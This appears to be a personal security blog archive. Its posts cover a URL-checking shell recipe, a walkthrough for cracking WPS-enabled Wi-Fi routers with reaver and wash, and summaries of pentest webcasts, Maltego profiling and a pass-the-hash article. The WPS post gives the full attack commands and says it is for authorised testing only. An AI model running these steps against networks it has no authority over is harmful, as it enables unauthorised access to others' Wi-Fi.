Large URL List Processing

9 02 2012

So – a quick detour came to my attention in the form of a list of urls.

These 680 odd urls were neatly formatted in a list, and lets for this excercise say they presented an image.

Now what – copy & paste each one into a browser to see if it works – FAIL.


So – using simple cli-fu I verified the URLs were valid & then created a page, embedding them all in there.

First – run your list through wget to verify its valid & working

# wget –spider -i urls.txt -T 2 -t 1 -nv -o urls.out

Then just grep for the HTTP 200 OK string out of urls.out

# grep “200 OK” urls.out > urls.out.httpok

Then tack on the html code so you can browse them all at once

# cat urls.httpok | awk ‘{print “\<img width=\”200px\” src=\””$4″\”\ />”}’ > urls.htm

Then simply fire it up in your favourite browser

# firefox urls.htm

identify & crack your WPS enabled AP

25 01 2012

##DISCLAIMER## – as usual, only use on devices you have approval for or own.

I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.

Main tools:
– reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
– the python script (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled

Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash

Do the install dance on your distro (works on BT5r1)

# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install

You can also use a fun little python script called (not to be confused with the WordPress tool) to fingerprint the AP

Step 1: Interface into monitor mode

# airmon-ng start wlan0

Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver

# wash –i mon0

Step 3: Fingerprint with

# ./ –i mon0

Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin

# reaver -i mon0 -b -AP MAC ADDRESS- -v

This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.

WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’

Information Security – By Offensive Security

5 09 2010

One stop infosec shop – the Offensive Security guys have thrown a whole bunch of juicy links together in one place – its worth a look:

The Future of Information Security – Offensive Security

Information Security is a vast and deep realm with many facets. Often, companies find themselves confused trying to find quality training, effective awareness programs or more meaningful certifications. In the end, many are left searching Google trying to find answers.

Offensive Security has has put together a set of resources to help your company in its mission to become more secure. Our mission statement is – “Security Through Education“. To us that is not just a statement, it is a way of life. Below is a list of resources that are at your disposal to give you some of the best security based education in the world today.

via Information Security – By Offensive Security.

PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

5 09 2010

Ok Ok …. I know im 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. Its starts out pretty high level, but is a nice rounded overview on the reasons, methods & tools that you can use to penetration test your network. Hosted by CoreSecurity & presented by Paul Asadoorian from pauldotcom.


• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities


• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, examples in here for several tools (nmap, nessus, nbtscan etc) and also ways to link them together, eg, run an nmap scan across the network, identifying windows hosts listening on 445, use the nmap scripting engine to determine if they are vulnerable – and use that list of hosts in nessus or metasploit etc.

Part 2 contains more information on why should you exploit a machine, how to exploit etc, using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host – automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings etc etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

there is some great info in here, its worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.


Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast

HttpWatch: Overview

5 09 2010

I just want to share a nice little tool I have been using to troubleshoot web page load times, and also as an easy way to see all the components of a loaded page without having to view source. You can simply load up the plugin, hit record, go to the website & you get a breakdown of each object, the time it takes to load and the link for it. It makes calls like “my internet is slow” easier to measure. Its free (for the basic version) and I find it very useful. Check it out. – HttpWatch

HttpWatch integrates with Internet Explorer and Firefox browsers to show you exactly what HTTP traffic is triggered when you access a web page. If you access a site that uses secure HTTPS connections, HttpWatch automatically displays the decrypted form of the network traffic.

Screenshot of HttpWatch

Conventional network monitoring tools just display low level data captured from the network. In contrast, HttpWatch has been optimized for displaying HTTP traffic and allows you to quickly see the values of headers, cookies, query strings and more…

HttpWatch also supports non-interactive examination of HTTP data. When log files are saved, a complete record of the HTTP traffic is saved in a compact file. You can even examine log files that your customers and suppliers have recorded using the free Basic Edition.

via HttpWatch: Overview.

The Ethical Hacker Network – Maltego 3: First Look

5 09 2010

Recently read a great review on Maltego – its a quick walk through on digging the internet for information on an individual, from just a name, to email addresses, photos to physical location & phone numbers – its worth a read, and worth a download & play with the free version.

What is Maltego?

Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

Maltego, developed by Roelof Temmingh, Andrew Macpherson and their team over at Paterva, is a premier information gathering tool that allows you to visualize and understand common trust relationships between entities of your choosing. Currently Maltego 3 is available for Windows and Linux. There is also an upcoming version for Apple users that has yet to be released.

Information gathering is a vital part of any penetration test or security audit, and it’s a process that demands patience, concentration and the right tool to be done correctly. In our case Maltego 3 is the tool for the job.

In this article we explore Maltego 3 and examine its fundamental features and a little hands-on with the newly designed version. If you haven’t already had a chance to upgrade to or pick up Maltego 3 you are missing out.

via The Ethical Hacker Network – Maltego 3: First Look.

Dissecting the Pass the Hash Attack

28 07 2010

Nice to see an article including Backtrack on the list. Its a nice writeup on using backtrack to pass the hash to use psexec to remotely launch a reverse shell. If you havent read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.